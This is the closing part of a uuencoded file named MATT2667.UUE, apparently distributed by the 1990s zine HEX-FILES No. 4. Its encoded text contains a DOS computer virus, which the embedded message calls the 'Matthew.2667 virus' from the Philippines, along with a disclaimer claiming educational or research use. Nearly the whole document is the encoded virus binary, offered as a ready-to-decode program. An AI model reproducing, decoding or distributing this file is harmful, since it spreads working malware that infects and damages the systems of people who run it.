M7?G#5090,\".P":,%K@!)HDFN@%8!YPN_Q[2`EW#'@X?O^D"C-@?CL"+\KE0
M`/SSI,,SR8O1N`!"Z,?_P^G<`1J-H9ZKGI^HJYY9@EFMGJ6E6;*HKF59G:A9
MIZBM6;"HJZNR69J;J*ZM6;*HKJM9I:*?GF5&0["AFJU9LJBN6;"BI:59GIJM
M6:BK69VKHJ>D=%FHJUF:FZBNK5FRJ*ZK69NHG;)E1D.PH9JM6;*HKEFPHJ6E
M6;">FJMG68*L6:>HK5FEHI^>6::HJYY9HJ:IJ*NMFJ>M6:VAFJ=&0Y^HJ)UE
M69JGG5FMH9Y9FZB=LEFFJ*N>6:*FJ:BKK9JGK5FMH9JG69REJ*VAGJQX1D.%
MJ*BD69JM6:VAGEF;HJN=K%FHGUFMH9Y9FJ*K=%FMH9ZR69VH6:>HK5FLJ+!9
MJ*M&0ZN>FJE9J*M9K*VHJYY9FK":LEFBIUF;FJNGK&59FJ>=6;*>K5FRJ*ZK
M6:&>FJ^>IZ6R1D-_FJVAGJM9GYZ>G:Q9K:&>IF=9>JN>6;*HKEFGJ*U9IJZ<
MH5FFJ*N>6:^:I:Z:FZ6>1D.MH9JG6:VAGK)X1D-&0UE965F&FJVMH9ZP66]S
M:VY987J@IYZL8EF&FK)9<FM@68*"?(QFC(6.67MG?&=&0T9#C+*LK9ZF67VB
MK*19AYZ>G9Z=9V=G0T-&7;0.NQ8`N0$`S1##B@0\770(+#GHZO]&Z_+#ZPN0
M,\".T+P`?.CS_U^XY0$K^`X?B_?HU_\SP,T6S1GK\U6J#A^YH0&_#0&^MP/\
MC-B.P(H$+#DFB`5'1N+QPW92<5)S4G.6B).2A41M;6=W47=P>1X.'[[/!;D5
M`(`L)$;B^A_#'@X?OL\%N14`@`0D1N+Z'\,>Z.O_'[H``2Z+#KL"M$`NBQXZ
M`^A<_1[HP_\?P[0VL@#H3_T]__]U`OG#,]+WX_?A"])U!RX[!KL"<NW#Z$[]
M#A^X)#7H*_V,!MP"B1[:`K@D);IF`^@:_>L2D+@D)2Z+%MH"+HX>W`+H!_W#
MZ*W_<NJZZ0*X`$/H^/QRWRZ)#CP#N`%#N2``Z.C\<L^X`CWHX/QRQRZC.@.+
MV+@`5^C2_"Z)%D(#+HD.1`.[_O^T2.C`_','M$CHN?QRH"ZC0`,SR8O1+HL>
M.@.X`D+HI/QR&BZC/@/HROQR$2Z+#CX#,](NCAY``[0_Z(C\<EXS]B[&!M`"
M`8$\35IT32ZAMP(YA+<!=!`NH;D".82Y`70&Z)#\ZP20ZS20+J$^`RX#!KL"
M/>;]<^\.'^C5_BZ+'CH#+HL./@,NCAY``_<6```STK1`Z"[\ZP20ZSB0+HX&
M0`.T2>@>_"Z+'CH#+HL60@,NBPY$`[@!5^@)_+0^Z`3\#A^ZZ0(NBPX\`[@!
M0^CT^\/KR2[&!M`"`"Z.'D`#,_:!?!)P)W3J@7P2<2=TXX%\$G(G=-R!?!)S
M)W35@7P2="=TSH%\$G4G=,>!?!)V)W3`@7P2=R=TN8%\$G@G=+*!?!)Y)W2K
M_W02+H\&R0+'1!)P)XM$#@40`"ZCQ0*+1!`NH\<"BT04+J/#`HM$%@40`"ZC
MP0+_=`0NCP:]`O]T`BZ/!K\",\`NH,L"!7`GB402BT0$@WP"`'0!2+L``O?C
M`T0"@](`!0\`@](`)?#_+J-&`RZ)%D@#+@,&NP*#T@!R5O?S"])T`4")1`2)
M5`(NH48#+HL62`.[$`#W\RM$""T0`(E$%L=$%``!B40.QT00:PPNBQXZ`^@8
M^[D<`#/2M$#HW_H.'XL61@.+#D@#N`!"Z,_ZZ%G]Z:'^!@X'O\\%@\("B_*Y
M%0#\\Z9U&HOR'@X?N@D!M`G-(1].Q@0`QT0!#0K&1!4`!\,N_Q[2`IP>4NC&
M_UH?G<^</0!+=0/K")"`_`IU%>OA'@965U!345+H.OU:65M87UX''YTN_R[2
M`E!345(@>[LP.X`0.Y`0"V`)PN_Q[>`@=:65M8PYR`_`!U#?;"@'4(@/H"
M=`/HS_^=+O\NW@*X(37-(8P&U`*)'M("P[@A)0X?NNX(S2'#N`@US2&,!M@"
MB1[6`L,SP([`)HP.(@"X40,FHR``PP:X$S7-(2Z,!N`"+HD>W@('PP8SP([`
M)HP.3@"X-0DFHTP`!\.,R([`CMBT2>C#^<,FC@8L`#/__+``)CH%=`>Y___R
MKNOT@\<#+HD^3`,NC`9*`\,NC`;,`NC4_RZ.!LP"!C/`CL`F@#Z\`0`'=0/I
M4`'I#0&,P/J.T(/L$/LNCA[G`BZ+-N4"OV(+N0D`_/.DCMCH:?_H>/_H*__H
M-O_H/O_H2?_HA/OHLOOH=O\.!PX?)J$L`"ZC3P.^"@"_:PNY!@#\\Z6[:@HF
MB1X*`":,#@P`NFL+N00`T^J#PB"T,>@/^0X.'RZ.!LP"OFL+OPH`N08`_/.E
M!RZAS`*^>@N)1`3'1`*``(E$",=$!EP`B40,QT0*;``NH4\#B02T,,TA+J).
M`_HNC!;%`BZ))L<"^RZ.'DH#+HL63`.X`$N[>@LN@#Y.`P-R!NBF^.L#D,TA
M^BZ.%L4"+HLFQP+[M$W-(;1,S2$NBPX^`X/!`KYK"[\``='I_/.E)O<6``&[
M``'_XRZ`/M`"`'01O^C]N1T`ONP*_/.DN^C]_^.,P"X#!L4"CM`NBR;'`HS`
M+@,&P0(NH^<"+J'#`BZCY0+X+O\NY0(NC`[G`B['!N4"8@N_``$.'[X``?RY
M8@J0D/.D!KC\"5#+%C\!#2`@(`T*36%B=6AA>2$-"@I4:&ES(&ES($UA='1H
M97<N,C8V-R!V:7)U<R!C;VUI;F<@=&\@>6]U(&9R;VT@=&AE(%!H:6QI<'!I
M;F5S+@T*0G)O=6=H="!T;R!Y;W4@;&EV92!B>2!(15@M1DE,15,@3F\N(#0-
M"@I(15@M1DE,15,@86YD(%EE6B!A<F4@;F]T(')E<W!O;G-I8FQE(&9O<B!A
M8W1U86PL(&EM<&QI960@86YD+V]R(&EM86=I;F%R>0T*9&%M86=E(&%R:7-I
M;F<@9&ER96-T;'D@;W(@:6YD:7)E8W1L>2!F<F]M('1H92!U<V4L(&UI<W5S
M92!O<B!N;VXM=7-E(&]F#0IT:&ES('!R;V=R86TN(%1H92!P97)S;VX@=VAO
M(&5X96-U=&5S('1H:7,@<')O9W)A;2!B96%R<R!F=6QL(')E<W!O;G-I8FEL
M:71Y#0IF;W(@:&ES+VAE<B!A8W1I;VYS+@T*"E1H:7,@<')O9W)A;2!I<R!S
M=')I8W1L>2!F;W(@961U8V%T:6]N86P@;W(@<F5S96%R8V@@<'5R<&]S97,@
:;VYL>2X-"@H*)`@@&@X?N@<!M`G-(;1,S2$`
`
end
ÄÄ MATT2667.UUE ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-=<{[* HF4 *]}>=-